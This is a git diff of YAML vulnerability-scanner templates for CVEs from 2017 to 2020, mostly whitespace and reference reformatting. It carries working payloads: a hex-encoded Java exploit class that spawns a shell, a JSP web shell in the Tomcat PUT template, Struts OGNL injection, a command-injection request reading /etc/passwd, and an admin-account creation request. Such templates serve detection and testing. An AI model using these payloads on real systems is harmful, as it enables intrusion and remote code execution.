a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034
+
+
+
+ com.supeream.exploits.XmlExp
+
+
+
+ cat /etc/passwd
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
matchers:
- type: regex
diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml
index edaaad11a4..fd2fd2781a 100755
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- - https://chowdera.com/2020/12/20201229190934023w.html
- - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12149
+ - https://chowdera.com/2020/12/20201229190934023w.html
+ - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:
diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml
index 24936c9c92..da7a45c350 100644
--- a/cves/2017/CVE-2017-12542.yaml
+++ b/cves/2017/CVE-2017-12542.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- - https://www.exploit-db.com/exploits/44005
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://www.exploit-db.com/exploits/44005
tags: cve,cve2017,ilo4,hpe
requests:
diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml
index 047b8cede3..e78786d62d 100644
--- a/cves/2017/CVE-2017-12615.yaml
+++ b/cves/2017/CVE-2017-12615.yaml
@@ -7,10 +7,10 @@ info:
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
- By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
- This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
- However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
- Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
+ By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
+ This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
+ However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
+ Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
@@ -19,21 +19,21 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
- <%@ page import="java.util.*,java.io.*"%>
- <%
- if (request.getParameter("cmd") != null) {
- out.println("Command: " + request.getParameter("cmd") + "
");
- Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
- OutputStream os = p.getOutputStream();
- InputStream in = p.getInputStream();
- DataInputStream dis = new DataInputStream(in);
- String disr = dis.readLine();
- while ( disr != null ) {
- out.println(disr);
- disr = dis.readLine();
- }
- }
- %>
+ <%@ page import="java.util.*,java.io.*"%>
+ <%
+ if (request.getParameter("cmd") != null) {
+ out.println("Command: " + request.getParameter("cmd") + "
");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+ %>
- method: GET
path:
diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml
index 8a40ce4dc2..f9f543a9b9 100644
--- a/cves/2017/CVE-2017-12629.yaml
+++ b/cves/2017/CVE-2017-12629.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
tags: cve,cve2017,solr,apache,oob,xxe
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- - https://twitter.com/honoki/status/1298636315613974532
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
+ - https://twitter.com/honoki/status/1298636315613974532
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:
diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml
index a2b0c6451a..46cbdb8d04 100644
--- a/cves/2017/CVE-2017-12637.yaml
+++ b/cves/2017/CVE-2017-12637.yaml
@@ -7,9 +7,9 @@ info:
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,lfi
reference:
- - https://www.cvedetails.com/cve/CVE-2017-12637/
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
+ - https://www.cvedetails.com/cve/CVE-2017-12637/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
+ - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
index 9b73a32f7b..6a91a097cf 100644
--- a/cves/2017/CVE-2017-14535.yaml
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- - https://www.exploit-db.com/exploits/49913
+ - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
+ - https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce
requests:
diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml
index 6ccc47bee7..87579df08b 100644
--- a/cves/2017/CVE-2017-14537.yaml
+++ b/cves/2017/CVE-2017-14537.yaml
@@ -7,9 +7,9 @@ info:
tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
+ - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
+ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
requests:
- raw:
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index 9cb67b8924..2312d8d61a 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -4,8 +4,8 @@ info:
name: PreAuth RCE on Palo Alto GlobalProtect
author: emadshanab,milo2012
reference:
- - https://www.exploit-db.com/exploits/43342
- - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
+ - https://www.exploit-db.com/exploits/43342
+ - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 1a84749dbd..954ace9e22 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -7,8 +7,8 @@ info:
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oob
reference:
- - https://hackerone.com/reports/810778
- - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+ - https://hackerone.com/reports/810778
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
- raw:
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 2a44a34b56..2003bf9c99 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: low
reference:
- - https://blog.zsec.uk/cve-2017-3528/
- - https://www.exploit-db.com/exploits/43592
+ - https://blog.zsec.uk/cve-2017-3528/
+ - https://www.exploit-db.com/exploits/43592
tags: oracle,redirect
requests:
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index f69dbce79e..6063ad3685 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -7,8 +7,8 @@ info:
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- - https://www.exploit-db.com/exploits/41497
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.exploit-db.com/exploits/41497
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 5d477c119a..e09313bde2 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -10,15 +10,15 @@ info:
requests:
- raw:
- |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
- Accept-Language: en
- Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
- Connection: Keep-Alive
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Pragma: no-cache
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
+ Accept-Language: en
+ Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
+ Connection: Keep-Alive
+ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
+ Pragma: no-cache
+ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml
index 6ed5ae081c..008a0df385 100644
--- a/cves/2017/CVE-2017-9805.yaml
+++ b/cves/2017/CVE-2017-9805.yaml
@@ -18,63 +18,63 @@ requests:
headers:
Content-Type: application/xml
body: |
-
+
matchers-condition: and
matchers:
diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml
index cd50ef3c89..1b13402b1e 100644
--- a/cves/2018/CVE-2018-16059.yaml
+++ b/cves/2018/CVE-2018-16059.yaml
@@ -5,8 +5,8 @@ info:
author: daffainfo
severity: medium
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- - https://www.exploit-db.com/exploits/45342
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
+ - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi
requests:
diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml
index a7e3337a69..f0ff1c0ca4 100644
--- a/cves/2018/CVE-2018-16283.yaml
+++ b/cves/2018/CVE-2018-16283.yaml
@@ -5,8 +5,8 @@ info:
author: 0x240x23elu
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- - https://www.exploit-db.com/exploits/45438
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+ - https://www.exploit-db.com/exploits/45438
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml
index 0a5c845723..9f70ac8290 100644
--- a/cves/2018/CVE-2018-17431.yaml
+++ b/cves/2018/CVE-2018-17431.yaml
@@ -7,8 +7,8 @@ info:
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
reference:
- - https://www.exploit-db.com/exploits/48825
- - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
+ - https://www.exploit-db.com/exploits/48825
+ - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
requests:
- raw:
diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml
index 297a1e31fc..bb3a606f79 100644
--- a/cves/2018/CVE-2018-8715.yaml
+++ b/cves/2018/CVE-2018-8715.yaml
@@ -7,7 +7,7 @@ info:
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass
reference:
- - https://github.com/embedthis/appweb/issues/610
+ - https://github.com/embedthis/appweb/issues/610
requests:
- raw:
diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml
index d367f5e9a6..ff40e30a68 100644
--- a/cves/2019/CVE-2019-0193.yaml
+++ b/cves/2019/CVE-2019-0193.yaml
@@ -6,9 +6,9 @@ info:
author: pdteam
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- - https://paper.seebug.org/1009/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
+ - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
+ - https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml
index 14eba8a50d..8527f6724d 100644
--- a/cves/2019/CVE-2019-0221.yaml
+++ b/cves/2019/CVE-2019-0221.yaml
@@ -9,10 +9,10 @@ info:
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
- The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
- 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
- therefore, vulnerable to XSS. SSI is disabled by default.
- The printenv command is intended for debugging and is unlikely to be present in a production website.
+ The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
+ 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
+ therefore, vulnerable to XSS. SSI is disabled by default.
+ The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:
diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml
index c67b2a83d4..6943ee9c04 100644
--- a/cves/2019/CVE-2019-1010287.yaml
+++ b/cves/2019/CVE-2019-1010287.yaml
@@ -12,7 +12,7 @@ info:
google-dork: inurl:"/timesheet/login.php"
requests:
- - raw: # Metod POST From login.php
+ - raw: # Metod POST From login.php
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml
index 84cbe7584e..7b9df06171 100644
--- a/cves/2019/CVE-2019-12616.yaml
+++ b/cves/2019/CVE-2019-12616.yaml
@@ -7,9 +7,9 @@ info:
severity: medium
tags: cve,cve2019,phpmyadmin,csrf
reference:
- - https://www.phpmyadmin.net/security/PMASA-2019-4/
- - https://www.exploit-db.com/exploits/46982
- - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
+ - https://www.phpmyadmin.net/security/PMASA-2019-4/
+ - https://www.exploit-db.com/exploits/46982
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12616
requests:
- method: GET
@@ -32,4 +32,4 @@ requests:
- type: status
status:
- 200
- - 401 #password protected
+ - 401 # password protected
diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml
index 007cdd429a..7569402a99 100644
--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -7,9 +7,9 @@ info:
severity: critical
tags: cve,cve2019,dlink,router,iot
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- - https://github.com/d0x0/D-Link-DIR-600M
- - https://www.exploit-db.com/exploits/47250
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
+ - https://github.com/d0x0/D-Link-DIR-600M
+ - https://www.exploit-db.com/exploits/47250
requests:
- raw:
diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml
index 14c565d303..dddcb93e9e 100644
--- a/cves/2019/CVE-2019-15043.yaml
+++ b/cves/2019/CVE-2019-15043.yaml
@@ -6,7 +6,7 @@ info:
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
+ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana
diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml
index 4bea33bbe8..c04cf98e43 100644
--- a/cves/2019/CVE-2019-15107.yaml
+++ b/cves/2019/CVE-2019-15107.yaml
@@ -9,7 +9,7 @@ info:
tags: cve,cve2019,webmin,rce
requests:
- - raw: #
+ - raw: #
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml
index d1b82e8f42..bbcb4dd03f 100644
--- a/cves/2019/CVE-2019-16097.yaml
+++ b/cves/2019/CVE-2019-16097.yaml
@@ -6,8 +6,8 @@ info:
description: |
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
reference:
- - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- - https://github.com/goharbor/harbor/issues/8951
+ - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
+ - https://github.com/goharbor/harbor/issues/8951
tags: cve,cve2019,intrusive,harbor
requests:
@@ -17,7 +17,7 @@ requests:
headers:
Content-Type: application/json
body: |
- {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
+ {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
matchers-condition: and
matchers:
diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml
index a1b698f29b..3a6a05e8f2 100644
--- a/cves/2019/CVE-2019-17506.yaml
+++ b/cves/2019/CVE-2019-17506.yaml
@@ -14,7 +14,7 @@ requests:
- "{{BaseURL}}/getcfg.php"
body: |
- SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
+ SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml
index 03698e2cc1..7a4d6d2413 100644
--- a/cves/2019/CVE-2019-2616.yaml
+++ b/cves/2019/CVE-2019-2616.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
- - https://www.exploit-db.com/exploits/46729
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
+ - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml
index 79f217f58c..0ee815a902 100644
--- a/cves/2019/CVE-2019-2767.yaml
+++ b/cves/2019/CVE-2019-2767.yaml
@@ -6,8 +6,8 @@ info:
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- - https://www.exploit-db.com/exploits/46729
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
+ - https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml
index 646c8d53ef..48af892d4f 100644
--- a/cves/2019/CVE-2019-3396.yaml
+++ b/cves/2019/CVE-2019-3396.yaml
@@ -10,16 +10,16 @@ info:
requests:
- raw:
- |
- POST /rest/tinymce/1/macro/preview HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Referer: {{Hostname}}
- Content-Length: 168
- Connection: close
+ POST /rest/tinymce/1/macro/preview HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en-US,en;q=0.5
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+ Referer: {{Hostname}}
+ Content-Length: 168
+ Connection: close
- {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+ {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and
matchers:
diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml
index bd88faf42d..b989d29259 100644
--- a/cves/2019/CVE-2019-7238.yaml
+++ b/cves/2019/CVE-2019-7238.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
tags: cve,cve2019,nexus,rce
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- - https://github.com/jas502n/CVE-2019-7238
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
+ - https://github.com/jas502n/CVE-2019-7238
requests:
- raw:
diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml
index 93e7ed7adb..660516cef2 100644
--- a/cves/2019/CVE-2019-7256.yaml
+++ b/cves/2019/CVE-2019-7256.yaml
@@ -11,7 +11,7 @@ info:
tags: cve,cve2019,emerge,rce
requests:
- - raw: # Default Port
+ - raw: # Default Port
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml
index f4623231a4..51972077b8 100644
--- a/cves/2019/CVE-2019-9733.yaml
+++ b/cves/2019/CVE-2019-9733.yaml
@@ -13,22 +13,22 @@ info:
requests:
- raw:
- |
- POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
- Host: {{Hostname}}
- Content-Length: 60
- Accept: application/json, text/plain, */*
- X-Requested-With: artUI
- serial: 58
- X-Forwarded-For: 127.0.0.1
- Request-Agent: artifactoryUI
- User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
- Content-Type: application/json
- Origin: http://{{Hostname}}
- Referer: http://{{Hostname}}/artifactory/webapp/
- Accept-Language: en-US,en;q=0.9
- Connection: close
+ POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 60
+ Accept: application/json, text/plain, */*
+ X-Requested-With: artUI
+ serial: 58
+ X-Forwarded-For: 127.0.0.1
+ Request-Agent: artifactoryUI
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
+ Content-Type: application/json
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/artifactory/webapp/
+ Accept-Language: en-US,en;q=0.9
+ Connection: close
- {"user":"access-admin","password":"password","type":"login"}
+ {"user":"access-admin","password":"password","type":"login"}
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml
index b857a53bc9..47d0f46a02 100644
--- a/cves/2020/CVE-2019-9618.yaml
+++ b/cves/2020/CVE-2019-9618.yaml
@@ -5,8 +5,8 @@ info:
author: 0x_Akoko
severity: critical
reference:
- - https://www.exploit-db.com/exploits/46537
- - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
+ - https://www.exploit-db.com/exploits/46537
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index 5ab3e4810e..126476f33d 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -6,9 +6,9 @@ info:
severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
reference:
- - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- - https://github.com/glpi-project/glpi/archive/9.4.6.zip
- - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
+ - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
+ - https://github.com/glpi-project/glpi/archive/9.4.6.zip
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect
